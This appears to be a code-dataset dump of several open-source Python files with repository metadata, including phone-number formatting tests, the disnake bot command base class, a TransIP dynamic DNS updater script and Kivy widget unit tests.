@pytest.mark.parametrize(
"number, expected_result",
[
("7446123456", "07446123456"),
("07446123456", "07446123456"),
("07446 123456", "07446123456"),
("+447446123456", "+447446123456"),
("+447446 123456", "+447446123456"),
("+4407446123456", "+447446123456"),
("+44 07446 123456", "+447446123456"),
],
)
def test_fix_number_formatting(number, expected_result):
result = fix_number_formatting(number)
assert expected_result == result
@pytest.mark.parametrize(
"number, expected_result",
[
("07446123456", True),
("074461234567", False),
("+447446123456", True),
("+4407446123456", False),
("+4474461234567", False),
]
)
def test_validate_phone_number(number, expected_result):
result = validate_phone_number(number)
assert expected_result == result
| true | true |
f71023e323fa23d2cf2eaffc7221a695ba60060f | 20,092 | py | Python | disnake/ext/commands/bot_base.py | MisileLab/disnake | c7f6a61f2fe2a05cb57027486d6f2cd7fe5399fa | [
"MIT"
] | null | null | null | disnake/ext/commands/bot_base.py | MisileLab/disnake | c7f6a61f2fe2a05cb57027486d6f2cd7fe5399fa | [
"MIT"
] | null | null | null | disnake/ext/commands/bot_base.py | MisileLab/disnake | c7f6a61f2fe2a05cb57027486d6f2cd7fe5399fa | [
"MIT"
] | null | null | null | """
The MIT License (MIT)
Copyright (c) 2015-2021 Rapptz
Copyright (c) 2021-present Disnake Development
Permission is hereby granted, free of charge, to any person obtaining a
copy of this software and associated documentation files (the "Software"),
to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense,
and/or sell copies of the Software, and to permit persons to whom the
Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
DEALINGS IN THE SOFTWARE.
"""
from __future__ import annotations
import asyncio
import collections
import collections.abc
import inspect
import sys
import traceback
from typing import Any, Callable, List, TYPE_CHECKING, Optional, TypeVar, Type, Union
import disnake
from .core import GroupMixin
from .view import StringView
from .context import Context
from . import errors
from .help import HelpCommand, DefaultHelpCommand
from .common_bot_base import CommonBotBase
if TYPE_CHECKING:
from typing_extensions import ParamSpec
from disnake.message import Message
from disnake.interactions import ApplicationCommandInteraction
from ._types import (
Check,
CoroFunc,
)
ApplicationCommandInteractionT = TypeVar(
"ApplicationCommandInteractionT", bound=ApplicationCommandInteraction, covariant=True
)
AnyMessageCommandInter = Any # Union[ApplicationCommandInteraction, UserCommandInteraction]
AnyUserCommandInter = Any # Union[ApplicationCommandInteraction, UserCommandInteraction]
P = ParamSpec("P")
__all__ = (
"when_mentioned",
"when_mentioned_or",
"BotBase",
)
MISSING: Any = disnake.utils.MISSING
T = TypeVar("T")
CFT = TypeVar("CFT", bound="CoroFunc")
CXT = TypeVar("CXT", bound="Context")
def when_mentioned(bot: BotBase, msg: Message) -> List[str]:
"""A callable that implements a command prefix equivalent to being mentioned.
These are meant to be passed into the :attr:`.Bot.command_prefix` attribute.
"""
# bot.user will never be None when this is called
return [f"<@{bot.user.id}> ", f"<@!{bot.user.id}> "] # type: ignore
def when_mentioned_or(*prefixes: str) -> Callable[[BotBase, Message], List[str]]:
"""A callable that implements when mentioned or other prefixes provided.
These are meant to be passed into the :attr:`.Bot.command_prefix` attribute.
Example
--------
.. code-block:: python3
bot = commands.Bot(command_prefix=commands.when_mentioned_or('!'))
.. note::
This callable returns another callable, so if this is done inside a custom
callable, you must call the returned callable, for example:
.. code-block:: python3
async def get_prefix(bot, message):
extras = await prefixes_for(message.guild) # returns a list
return commands.when_mentioned_or(*extras)(bot, message)
See Also
----------
:func:`.when_mentioned`
"""
def inner(bot, msg):
r = list(prefixes)
r = when_mentioned(bot, msg) + r
return r
return inner
def _is_submodule(parent: str, child: str) -> bool:
return parent == child or child.startswith(parent + ".")
class _DefaultRepr:
def __repr__(self):
return "<default-help-command>"
_default: Any = _DefaultRepr()
class BotBase(CommonBotBase, GroupMixin):
def __init__(
self,
command_prefix: Optional[Union[str, List[str], Callable]] = None,
help_command: HelpCommand = _default,
description: str = None,
**options: Any,
):
super().__init__(**options)
self.command_prefix = command_prefix
self._checks: List[Check] = []
self._check_once = []
self._before_invoke = None
self._after_invoke = None
self._help_command = None
self.description: str = inspect.cleandoc(description) if description else ""
self.strip_after_prefix: bool = options.get("strip_after_prefix", False)
if help_command is _default:
self.help_command = DefaultHelpCommand()
else:
self.help_command = help_command
# internal helpers
async def on_command_error(self, context: Context, exception: errors.CommandError) -> None:
"""|coro|
The default command error handler provided by the bot.
By default this prints to :data:`sys.stderr` however it could be
overridden to have a different implementation.
This only fires if you do not specify any listeners for command error.
"""
if self.extra_events.get("on_command_error", None):
return
command = context.command
if command and command.has_error_handler():
return
cog = context.cog
if cog and cog.has_error_handler():
return
print(f"Ignoring exception in command {context.command}:", file=sys.stderr)
traceback.print_exception(
type(exception), exception, exception.__traceback__, file=sys.stderr
)
# global check registration
def add_check(
self,
func: Check,
*,
call_once: bool = False,
) -> None:
"""Adds a global check to the bot.
This is the non-decorator interface to :meth:`.check`,
:meth:`.check_once`, :meth:`.slash_command_check` and etc.
If none of bool params are specified, the check is for
text commands only.
Parameters
-----------
func
The function that was used as a global check.
call_once: :class:`bool`
If the function should only be called once per
:meth:`.invoke` call.
"""
if call_once:
self._check_once.append(func)
else:
self._checks.append(func)
def remove_check(
self,
func: Check,
*,
call_once: bool = False,
) -> None:
"""Removes a global check from the bot.
This function is idempotent and will not raise an exception
if the function is not in the global checks.
If none of bool params are specified, the check is for
text commands only.
Parameters
-----------
func
The function to remove from the global checks.
call_once: :class:`bool`
If the function was added with ``call_once=True`` in
the :meth:`.Bot.add_check` call or using :meth:`.check_once`.
"""
l = self._check_once if call_once else self._checks
try:
l.remove(func)
except ValueError:
pass
def check(self, func: T) -> T:
r"""A decorator that adds a global check to the bot.
A global check is similar to a :func:`.check` that is applied
on a per command basis except it is run before any command checks
have been verified and applies to every command the bot has.
.. note::
This function can either be a regular function or a coroutine.
Similar to a command :func:`.check`\, this takes a single parameter
of type :class:`.Context` and can only raise exceptions inherited from
:exc:`.CommandError`.
Example
---------
.. code-block:: python3
@bot.check
def check_commands(ctx):
return ctx.command.qualified_name in allowed_commands
"""
# T was used instead of Check to ensure the type matches on return
self.add_check(func) # type: ignore
return func
def check_once(self, func: CFT) -> CFT:
r"""A decorator that adds a "call once" global check to the bot.
Unlike regular global checks, this one is called only once
per :meth:`.invoke` call.
Regular global checks are called whenever a command is called
or :meth:`.Command.can_run` is called. This type of check
bypasses that and ensures that it's called only once, even inside
the default help command.
.. note::
When using this function the :class:`.Context` sent to a group subcommand
may only parse the parent command and not the subcommands due to it
being invoked once per :meth:`.Bot.invoke` call.
.. note::
This function can either be a regular function or a coroutine.
Similar to a command :func:`.check`\, this takes a single parameter
of type :class:`.Context` and can only raise exceptions inherited from
:exc:`.CommandError`.
Example
---------
.. code-block:: python3
@bot.check_once
def whitelist(ctx):
return ctx.message.author.id in my_whitelist
"""
self.add_check(func, call_once=True)
return func
async def can_run(self, ctx: Context, *, call_once: bool = False) -> bool:
data = self._check_once if call_once else self._checks
if len(data) == 0:
return True
# type-checker doesn't distinguish between functions and methods
return await disnake.utils.async_all(f(ctx) for f in data) # type: ignore
def before_invoke(self, coro: CFT) -> CFT:
"""A decorator that registers a coroutine as a pre-invoke hook.
A pre-invoke hook is called directly before the command is
called. This makes it a useful function to set up database
connections or any type of set up required.
This pre-invoke hook takes a sole parameter, a :class:`.Context`.
.. note::
The :meth:`~.Bot.before_invoke` and :meth:`~.Bot.after_invoke` hooks are
only called if all checks and argument parsing procedures pass
without error. If any check or argument parsing procedures fail
then the hooks are not called.
Parameters
-----------
coro: :ref:`coroutine <coroutine>`
The coroutine to register as the pre-invoke hook.
Raises
-------
TypeError
The coroutine passed is not actually a coroutine.
"""
if not asyncio.iscoroutinefunction(coro):
raise TypeError("The pre-invoke hook must be a coroutine.")
self._before_invoke = coro
return coro
def after_invoke(self, coro: CFT) -> CFT:
r"""A decorator that registers a coroutine as a post-invoke hook.
A post-invoke hook is called directly after the command is
called. This makes it a useful function to clean-up database
connections or any type of clean up required.
This post-invoke hook takes a sole parameter, a :class:`.Context`.
.. note::
Similar to :meth:`~.Bot.before_invoke`\, this is not called unless
checks and argument parsing procedures succeed. This hook is,
however, **always** called regardless of the internal command
callback raising an error (i.e. :exc:`.CommandInvokeError`\).
This makes it ideal for clean-up scenarios.
Parameters
-----------
coro: :ref:`coroutine <coroutine>`
The coroutine to register as the post-invoke hook.
Raises
-------
TypeError
The coroutine passed is not actually a coroutine.
"""
if not asyncio.iscoroutinefunction(coro):
raise TypeError("The post-invoke hook must be a coroutine.")
self._after_invoke = coro
return coro
# extensions
def _remove_module_references(self, name: str) -> None:
super()._remove_module_references(name)
# remove all the commands from the module
for cmd in self.all_commands.copy().values():
if cmd.module is not None and _is_submodule(name, cmd.module):
if isinstance(cmd, GroupMixin):
cmd.recursively_remove_all_commands()
self.remove_command(cmd.name)
# help command stuff
@property
def help_command(self) -> Optional[HelpCommand]:
return self._help_command
@help_command.setter
def help_command(self, value: Optional[HelpCommand]) -> None:
if value is not None:
if not isinstance(value, HelpCommand):
raise TypeError("help_command must be a subclass of HelpCommand")
if self._help_command is not None:
self._help_command._remove_from_bot(self)
self._help_command = value
value._add_to_bot(self)
elif self._help_command is not None:
self._help_command._remove_from_bot(self)
self._help_command = None
else:
self._help_command = None
# command processing
async def get_prefix(self, message: Message) -> Optional[Union[List[str], str]]:
"""|coro|
Retrieves the prefix the bot is listening to
with the message as a context.
Parameters
-----------
message: :class:`disnake.Message`
The message context to get the prefix of.
Returns
--------
Optional[Union[List[:class:`str`], :class:`str`]]
A list of prefixes or a single prefix that the bot is
listening for. None if the bot isn't listening for prefixes.
"""
prefix = ret = self.command_prefix
if callable(prefix):
ret = await disnake.utils.maybe_coroutine(prefix, self, message)
if ret is None:
return None
if not isinstance(ret, str):
try:
ret = list(ret) # type: ignore
except TypeError:
# It's possible that a generator raised this exception. Don't
# replace it with our own error if that's the case.
if isinstance(ret, collections.abc.Iterable):
raise
raise TypeError(
"command_prefix must be plain string, iterable of strings, or callable "
f"returning either of these, not {ret.__class__.__name__}"
)
if not ret:
raise ValueError("Iterable command_prefix must contain at least one prefix")
return ret
async def get_context(self, message: Message, *, cls: Type[CXT] = Context) -> CXT:
r"""|coro|
Returns the invocation context from the message.
This is a more low-level counter-part for :meth:`.process_commands`
to allow users more fine grained control over the processing.
The returned context is not guaranteed to be a valid invocation
context, :attr:`.Context.valid` must be checked to make sure it is.
If the context is not valid then it is not a valid candidate to be
invoked under :meth:`~.Bot.invoke`.
Parameters
-----------
message: :class:`disnake.Message`
The message to get the invocation context from.
cls
The factory class that will be used to create the context.
By default, this is :class:`.Context`. Should a custom
class be provided, it must be similar enough to :class:`.Context`\'s
interface.
Returns
--------
:class:`.Context`
The invocation context. The type of this can change via the
``cls`` parameter.
"""
view = StringView(message.content)
ctx = cls(prefix=None, view=view, bot=self, message=message)
if message.author.id == self.user.id: # type: ignore
return ctx
prefix = await self.get_prefix(message)
invoked_prefix = prefix
if prefix is None:
return ctx
elif isinstance(prefix, str):
if not view.skip_string(prefix):
return ctx
else:
try:
# if the context class' __init__ consumes something from the view this
# will be wrong. That seems unreasonable though.
if message.content.startswith(tuple(prefix)):
invoked_prefix = disnake.utils.find(view.skip_string, prefix)
else:
return ctx
except TypeError:
if not isinstance(prefix, list):
raise TypeError(
"get_prefix must return either a string or a list of string, "
f"not {prefix.__class__.__name__}"
)
# It's possible a bad command_prefix got us here.
for value in prefix:
if not isinstance(value, str):
raise TypeError(
"Iterable command_prefix or list returned from get_prefix must "
f"contain only strings, not {value.__class__.__name__}"
)
# Getting here shouldn't happen
raise
if self.strip_after_prefix:
view.skip_ws()
invoker = view.get_word()
ctx.invoked_with = invoker
# type-checker fails to narrow invoked_prefix type.
ctx.prefix = invoked_prefix # type: ignore
ctx.command = self.all_commands.get(invoker)
return ctx
async def invoke(self, ctx: Context) -> None:
"""|coro|
Invokes the command given under the invocation context and
handles all the internal event dispatch mechanisms.
Parameters
-----------
ctx: :class:`.Context`
The invocation context to invoke.
"""
if ctx.command is not None:
self.dispatch("command", ctx)
try:
if await self.can_run(ctx, call_once=True):
await ctx.command.invoke(ctx)
else:
raise errors.CheckFailure("The global check once functions failed.")
except errors.CommandError as exc:
await ctx.command.dispatch_error(ctx, exc)
else:
self.dispatch("command_completion", ctx)
elif ctx.invoked_with:
exc = errors.CommandNotFound(f'Command "{ctx.invoked_with}" is not found')
self.dispatch("command_error", ctx, exc)
async def process_commands(self, message: Message) -> None:
"""|coro|
This function processes the commands that have been registered
to the bot and other groups. Without this coroutine, none of the
commands will be triggered.
By default, this coroutine is called inside the :func:`.on_message`
event. If you choose to override the :func:`.on_message` event, then
you should invoke this coroutine as well.
This is built using other low level tools, and is equivalent to a
call to :meth:`~.Bot.get_context` followed by a call to :meth:`~.Bot.invoke`.
This also checks if the message's author is a bot and doesn't
call :meth:`~.Bot.get_context` or :meth:`~.Bot.invoke` if so.
Parameters
-----------
message: :class:`disnake.Message`
The message to process commands for.
"""
if message.author.bot:
return
ctx = await self.get_context(message)
await self.invoke(ctx)
async def on_message(self, message):
await self.process_commands(message)
| 33.375415 | 96 | 0.616016 |
from __future__ import annotations
import asyncio
import collections
import collections.abc
import inspect
import sys
import traceback
from typing import Any, Callable, List, TYPE_CHECKING, Optional, TypeVar, Type, Union
import disnake
from .core import GroupMixin
from .view import StringView
from .context import Context
from . import errors
from .help import HelpCommand, DefaultHelpCommand
from .common_bot_base import CommonBotBase
if TYPE_CHECKING:
from typing_extensions import ParamSpec
from disnake.message import Message
from disnake.interactions import ApplicationCommandInteraction
from ._types import (
Check,
CoroFunc,
)
ApplicationCommandInteractionT = TypeVar(
"ApplicationCommandInteractionT", bound=ApplicationCommandInteraction, covariant=True
)
AnyMessageCommandInter = Any
AnyUserCommandInter = Any
P = ParamSpec("P")
__all__ = (
"when_mentioned",
"when_mentioned_or",
"BotBase",
)
MISSING: Any = disnake.utils.MISSING
T = TypeVar("T")
CFT = TypeVar("CFT", bound="CoroFunc")
CXT = TypeVar("CXT", bound="Context")
def when_mentioned(bot: BotBase, msg: Message) -> List[str]:
return [f"<@{bot.user.id}> ", f"<@!{bot.user.id}> "]
def when_mentioned_or(*prefixes: str) -> Callable[[BotBase, Message], List[str]]:
def inner(bot, msg):
r = list(prefixes)
r = when_mentioned(bot, msg) + r
return r
return inner
def _is_submodule(parent: str, child: str) -> bool:
return parent == child or child.startswith(parent + ".")
class _DefaultRepr:
def __repr__(self):
return "<default-help-command>"
_default: Any = _DefaultRepr()
class BotBase(CommonBotBase, GroupMixin):
def __init__(
self,
command_prefix: Optional[Union[str, List[str], Callable]] = None,
help_command: HelpCommand = _default,
description: str = None,
**options: Any,
):
super().__init__(**options)
self.command_prefix = command_prefix
self._checks: List[Check] = []
self._check_once = []
self._before_invoke = None
self._after_invoke = None
self._help_command = None
self.description: str = inspect.cleandoc(description) if description else ""
self.strip_after_prefix: bool = options.get("strip_after_prefix", False)
if help_command is _default:
self.help_command = DefaultHelpCommand()
else:
self.help_command = help_command
async def on_command_error(self, context: Context, exception: errors.CommandError) -> None:
if self.extra_events.get("on_command_error", None):
return
command = context.command
if command and command.has_error_handler():
return
cog = context.cog
if cog and cog.has_error_handler():
return
print(f"Ignoring exception in command {context.command}:", file=sys.stderr)
traceback.print_exception(
type(exception), exception, exception.__traceback__, file=sys.stderr
)
def add_check(
self,
func: Check,
*,
call_once: bool = False,
) -> None:
if call_once:
self._check_once.append(func)
else:
self._checks.append(func)
def remove_check(
self,
func: Check,
*,
call_once: bool = False,
) -> None:
l = self._check_once if call_once else self._checks
try:
l.remove(func)
except ValueError:
pass
def check(self, func: T) -> T:
self.add_check(func)
return func
def check_once(self, func: CFT) -> CFT:
self.add_check(func, call_once=True)
return func
async def can_run(self, ctx: Context, *, call_once: bool = False) -> bool:
data = self._check_once if call_once else self._checks
if len(data) == 0:
return True
return await disnake.utils.async_all(f(ctx) for f in data) # type: ignore
def before_invoke(self, coro: CFT) -> CFT:
if not asyncio.iscoroutinefunction(coro):
raise TypeError("The pre-invoke hook must be a coroutine.")
self._before_invoke = coro
return coro
def after_invoke(self, coro: CFT) -> CFT:
if not asyncio.iscoroutinefunction(coro):
raise TypeError("The post-invoke hook must be a coroutine.")
self._after_invoke = coro
return coro
# extensions
def _remove_module_references(self, name: str) -> None:
super()._remove_module_references(name)
# remove all the commands from the module
for cmd in self.all_commands.copy().values():
if cmd.module is not None and _is_submodule(name, cmd.module):
if isinstance(cmd, GroupMixin):
cmd.recursively_remove_all_commands()
self.remove_command(cmd.name)
# help command stuff
@property
def help_command(self) -> Optional[HelpCommand]:
return self._help_command
@help_command.setter
def help_command(self, value: Optional[HelpCommand]) -> None:
if value is not None:
if not isinstance(value, HelpCommand):
raise TypeError("help_command must be a subclass of HelpCommand")
if self._help_command is not None:
self._help_command._remove_from_bot(self)
self._help_command = value
value._add_to_bot(self)
elif self._help_command is not None:
self._help_command._remove_from_bot(self)
self._help_command = None
else:
self._help_command = None
# command processing
async def get_prefix(self, message: Message) -> Optional[Union[List[str], str]]:
prefix = ret = self.command_prefix
if callable(prefix):
ret = await disnake.utils.maybe_coroutine(prefix, self, message)
if ret is None:
return None
if not isinstance(ret, str):
try:
ret = list(ret) # type: ignore
except TypeError:
# It's possible that a generator raised this exception. Don't
# replace it with our own error if that's the case.
if isinstance(ret, collections.abc.Iterable):
raise
raise TypeError(
"command_prefix must be plain string, iterable of strings, or callable "
f"returning either of these, not {ret.__class__.__name__}"
)
if not ret:
raise ValueError("Iterable command_prefix must contain at least one prefix")
return ret
async def get_context(self, message: Message, *, cls: Type[CXT] = Context) -> CXT:
view = StringView(message.content)
ctx = cls(prefix=None, view=view, bot=self, message=message)
if message.author.id == self.user.id:
return ctx
prefix = await self.get_prefix(message)
invoked_prefix = prefix
if prefix is None:
return ctx
elif isinstance(prefix, str):
if not view.skip_string(prefix):
return ctx
else:
try:
# will be wrong. That seems unreasonable though.
if message.content.startswith(tuple(prefix)):
invoked_prefix = disnake.utils.find(view.skip_string, prefix)
else:
return ctx
except TypeError:
if not isinstance(prefix, list):
raise TypeError(
"get_prefix must return either a string or a list of string, "
f"not {prefix.__class__.__name__}"
)
# It's possible a bad command_prefix got us here.
for value in prefix:
if not isinstance(value, str):
raise TypeError(
"Iterable command_prefix or list returned from get_prefix must "
f"contain only strings, not {value.__class__.__name__}"
)
raise
if self.strip_after_prefix:
view.skip_ws()
invoker = view.get_word()
ctx.invoked_with = invoker
# type-checker fails to narrow invoked_prefix type.
ctx.prefix = invoked_prefix # type: ignore
ctx.command = self.all_commands.get(invoker)
return ctx
async def invoke(self, ctx: Context) -> None:
if ctx.command is not None:
self.dispatch("command", ctx)
try:
if await self.can_run(ctx, call_once=True):
await ctx.command.invoke(ctx)
else:
raise errors.CheckFailure("The global check once functions failed.")
except errors.CommandError as exc:
await ctx.command.dispatch_error(ctx, exc)
else:
self.dispatch("command_completion", ctx)
elif ctx.invoked_with:
exc = errors.CommandNotFound(f'Command "{ctx.invoked_with}" is not found')
self.dispatch("command_error", ctx, exc)
async def process_commands(self, message: Message) -> None:
if message.author.bot:
return
ctx = await self.get_context(message)
await self.invoke(ctx)
async def on_message(self, message):
await self.process_commands(message)
| true | true |
f71024eea5e98c7df524c35442bced80a11680cf | 2,316 | py | Python | dyndns.py | jkeuper/transip_dyndns | 4a1d778b72f0a762f97bdaae16192b8216e99cea | [
"MIT"
] | null | null | null | dyndns.py | jkeuper/transip_dyndns | 4a1d778b72f0a762f97bdaae16192b8216e99cea | [
"MIT"
] | null | null | null | dyndns.py | jkeuper/transip_dyndns | 4a1d778b72f0a762f97bdaae16192b8216e99cea | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
import sys
import argparse
from requests import get
from transip_rest_client import TransipRestClient
def getOptions(args=sys.argv[1:]):
parser = argparse.ArgumentParser(description="DynDNS: Updates a DNS record for a dynamic IP address.")
parser.add_argument("-u", "--user", help="Your username.", required=True)
parser.add_argument("-k", "--key", help="Key file containing RSA private key.", required=True)
parser.add_argument("-n", "--name", help="Name of the record (e.g. 'www').", required=True)
parser.add_argument("-d", "--domain", help="Existing DNS domain (e.g. 'example.com').", required=True)
parser.add_argument("-v", "--verbose", action='store_true', help="Verbose mode.")
options = parser.parse_args(args)
return options
def find(arr , id):
for x in arr:
if x["name"] == id:
return x
def main(key, username, domain, name, verbose):
with open(key, 'r') as f:
my_RSA_key = f.read()
if "BEGIN RSA PRIVATE KEY" not in my_RSA_key:
print("Key in incorrect format, convert the key with the following command:")
print("openssl rsa -in privatekey.txt -out rsaprivatekey.txt")
return
newIp = get('https://api.ipify.org').text
if verbose:
print(f"Retrieved IP from api.ipify.org: {newIp}")
client = TransipRestClient(user=username, rsaprivate_key=my_RSA_key, global_key=True)
entries = client.get_dns_entries(domain=domain)
if verbose:
print(f"Found {len(entries)} DNS entries")
entry = find(entries, name)
if entry is None:
print(f"No ip found, adding {newIp}")
client.post_dns_entry(domain=domain, name=name, expire=300, record_type='A', content=newIp)
else:
oldIp = entry["content"]
if verbose:
print(f"Found current IP in DNS entry: {oldIp}")
if oldIp != newIp:
print(f"Updating {oldIp} to {newIp}")
client.patch_dns_entry(domain=domain, name=name, record_type='A', content=newIp)
else:
print(f"Not updating {oldIp}")
if __name__ == "__main__":
options = getOptions()
if options.verbose:
print("Verbose output enabled.")
main(options.key, options.user, options.domain, options.name, options.verbose)
| 35.630769 | 106 | 0.648964 |
import sys
import argparse
from requests import get
from transip_rest_client import TransipRestClient
def getOptions(args=sys.argv[1:]):
parser = argparse.ArgumentParser(description="DynDNS: Updates a DNS record for a dynamic IP address.")
parser.add_argument("-u", "--user", help="Your username.", required=True)
parser.add_argument("-k", "--key", help="Key file containing RSA private key.", required=True)
parser.add_argument("-n", "--name", help="Name of the record (e.g. 'www').", required=True)
parser.add_argument("-d", "--domain", help="Existing DNS domain (e.g. 'example.com').", required=True)
parser.add_argument("-v", "--verbose", action='store_true', help="Verbose mode.")
options = parser.parse_args(args)
return options
def find(arr , id):
for x in arr:
if x["name"] == id:
return x
def main(key, username, domain, name, verbose):
with open(key, 'r') as f:
my_RSA_key = f.read()
if "BEGIN RSA PRIVATE KEY" not in my_RSA_key:
print("Key in incorrect format, convert the key with the following command:")
print("openssl rsa -in privatekey.txt -out rsaprivatekey.txt")
return
newIp = get('https://api.ipify.org').text
if verbose:
print(f"Retrieved IP from api.ipify.org: {newIp}")
client = TransipRestClient(user=username, rsaprivate_key=my_RSA_key, global_key=True)
entries = client.get_dns_entries(domain=domain)
if verbose:
print(f"Found {len(entries)} DNS entries")
entry = find(entries, name)
if entry is None:
print(f"No ip found, adding {newIp}")
client.post_dns_entry(domain=domain, name=name, expire=300, record_type='A', content=newIp)
else:
oldIp = entry["content"]
if verbose:
print(f"Found current IP in DNS entry: {oldIp}")
if oldIp != newIp:
print(f"Updating {oldIp} to {newIp}")
client.patch_dns_entry(domain=domain, name=name, record_type='A', content=newIp)
else:
print(f"Not updating {oldIp}")
if __name__ == "__main__":
options = getOptions()
if options.verbose:
print("Verbose output enabled.")
main(options.key, options.user, options.domain, options.name, options.verbose)
| true | true |
f7102601e30fef5f8d8eff91e5adb145e938c0cf | 4,105 | py | Python | kivy/tests/test_widget.py | yunus-ceyhan/kivy | ba646bd82c8eb5c505c68d18de52f8f3e6cf199a | [
"MIT"
] | 1 | 2022-02-06T11:20:43.000Z | 2022-02-06T11:20:43.000Z | kivy/tests/test_widget.py | yunus-ceyhan/kivy | ba646bd82c8eb5c505c68d18de52f8f3e6cf199a | [
"MIT"
] | null | null | null | kivy/tests/test_widget.py | yunus-ceyhan/kivy | ba646bd82c8eb5c505c68d18de52f8f3e6cf199a | [
"MIT"
] | 1 | 2022-01-19T09:10:47.000Z | 2022-01-19T09:10:47.000Z | import unittest
from tempfile import mkdtemp
from shutil import rmtree
class WidgetTestCase(unittest.TestCase):
def setUp(self):
from kivy.uix.widget import Widget
self.cls = Widget
self.root = Widget()
def test_add_remove_widget(self):
root = self.root
self.assertEqual(root.children, [])
c1 = self.cls()
root.add_widget(c1)
self.assertEqual(root.children, [c1])
root.remove_widget(c1)
self.assertEqual(root.children, [])
def test_invalid_add_widget(self):
from kivy.uix.widget import WidgetException
try:
# None of them should work
self.root.add_widget(None)
self.root.add_widget(WidgetException)
self.root.add_widget(self.cls)
self.fail()
except WidgetException:
pass
def test_clear_widgets(self):
root = self.root
self.assertEqual(root.children, [])
c1 = self.cls()
c2 = self.cls()
c3 = self.cls()
root.add_widget(c1, index=0)
root.add_widget(c2, index=1)
root.add_widget(c3, index=2)
self.assertEqual(root.children, [c1, c2, c3])
root.clear_widgets([c2])
self.assertEqual(root.children, [c1, c3])
root.clear_widgets([])
self.assertEqual(root.children, [c1, c3])
root.clear_widgets()
self.assertEqual(root.children, [])
def test_clear_widgets_children(self):
root = self.root
for _ in range(10):
root.add_widget(self.cls())
self.assertEqual(len(root.children), 10)
root.clear_widgets(root.children)
self.assertEqual(root.children, [])
def test_position(self):
wid = self.root
wid.x = 50
self.assertEqual(wid.x, 50)
self.assertEqual(wid.pos, [50, 0])
wid.y = 60
self.assertEqual(wid.y, 60)
self.assertEqual(wid.pos, [50, 60])
wid.pos = (0, 0)
self.assertEqual(wid.pos, [0, 0])
self.assertEqual(wid.x, 0)
self.assertEqual(wid.y, 0)
def test_size(self):
wid = self.root
wid.width = 50
self.assertEqual(wid.width, 50)
self.assertEqual(wid.size, [50, 100])
wid.height = 60
self.assertEqual(wid.height, 60)
self.assertEqual(wid.size, [50, 60])
wid.size = (100, 100)
self.assertEqual(wid.size, [100, 100])
self.assertEqual(wid.width, 100)
self.assertEqual(wid.height, 100)
def test_collision(self):
wid = self.root
self.assertEqual(wid.pos, [0, 0])
self.assertEqual(wid.size, [100, 100])
self.assertEqual(wid.collide_point(-1, -1), False)
self.assertEqual(wid.collide_point(0, 0), True)
self.assertEqual(wid.collide_point(50, 50), True)
self.assertEqual(wid.collide_point(100, 100), True)
self.assertEqual(wid.collide_point(200, 0), False)
self.assertEqual(wid.collide_point(500, 500), False)
# Currently rejected with a Shader didn't link, but work alone.
@unittest.skip("Doesn't work with testsuite, but work alone")
def test_export_to_png(self):
from kivy.core.image import Image as CoreImage
from kivy.uix.button import Button
from os.path import join
wid = Button(text='test', size=(200, 100), size_hint=(None, None))
self.root.add_widget(wid)
tmp = mkdtemp()
wid.export_to_png(join(tmp, 'a.png'))
wid.export_to_png(join(tmp, 'b.png'), scale=.5)
wid.export_to_png(join(tmp, 'c.png'), scale=2)
self.assertEqual(CoreImage(join(tmp, 'a.png')).size, (200, 100))
self.assertEqual(CoreImage(join(tmp, 'b.png')).size, (100, 50))
self.assertEqual(CoreImage(join(tmp, 'c.png')).size, (400, 200))
rmtree(tmp)
self.root.remove_widget(wid)
def test_disabled(self):
from kivy.uix.widget import Widget
w = Widget(disabled=None)
w.disabled = False
w.disabled = True
self.assertEqual(w.disabled, True)
| 32.070313 | 74 | 0.60268 | import unittest
from tempfile import mkdtemp
from shutil import rmtree
class WidgetTestCase(unittest.TestCase):
def setUp(self):
from kivy.uix.widget import Widget
self.cls = Widget
self.root = Widget()
def test_add_remove_widget(self):
root = self.root
self.assertEqual(root.children, [])
c1 = self.cls()
root.add_widget(c1)
self.assertEqual(root.children, [c1])
root.remove_widget(c1)
self.assertEqual(root.children, [])
def test_invalid_add_widget(self):
from kivy.uix.widget import WidgetException
try:
self.root.add_widget(None)
self.root.add_widget(WidgetException)
self.root.add_widget(self.cls)
self.fail()
except WidgetException:
pass
def test_clear_widgets(self):
root = self.root
self.assertEqual(root.children, [])
c1 = self.cls()
c2 = self.cls()
c3 = self.cls()
root.add_widget(c1, index=0)
root.add_widget(c2, index=1)
root.add_widget(c3, index=2)
self.assertEqual(root.children, [c1, c2, c3])
root.clear_widgets([c2])
self.assertEqual(root.children, [c1, c3])
root.clear_widgets([])
self.assertEqual(root.children, [c1, c3])
root.clear_widgets()
self.assertEqual(root.children, [])
def test_clear_widgets_children(self):
root = self.root
for _ in range(10):
root.add_widget(self.cls())
self.assertEqual(len(root.children), 10)
root.clear_widgets(root.children)
self.assertEqual(root.children, [])
def test_position(self):
wid = self.root
wid.x = 50
self.assertEqual(wid.x, 50)
self.assertEqual(wid.pos, [50, 0])
wid.y = 60
self.assertEqual(wid.y, 60)
self.assertEqual(wid.pos, [50, 60])
wid.pos = (0, 0)
self.assertEqual(wid.pos, [0, 0])
self.assertEqual(wid.x, 0)
self.assertEqual(wid.y, 0)
def test_size(self):
wid = self.root
wid.width = 50
self.assertEqual(wid.width, 50)
self.assertEqual(wid.size, [50, 100])
wid.height = 60
self.assertEqual(wid.height, 60)
self.assertEqual(wid.size, [50, 60])
wid.size = (100, 100)
self.assertEqual(wid.size, [100, 100])
self.assertEqual(wid.width, 100)
self.assertEqual(wid.height, 100)
def test_collision(self):
wid = self.root
self.assertEqual(wid.pos, [0, 0])
self.assertEqual(wid.size, [100, 100])
self.assertEqual(wid.collide_point(-1, -1), False)
self.assertEqual(wid.collide_point(0, 0), True)
self.assertEqual(wid.collide_point(50, 50), True)
self.assertEqual(wid.collide_point(100, 100), True)
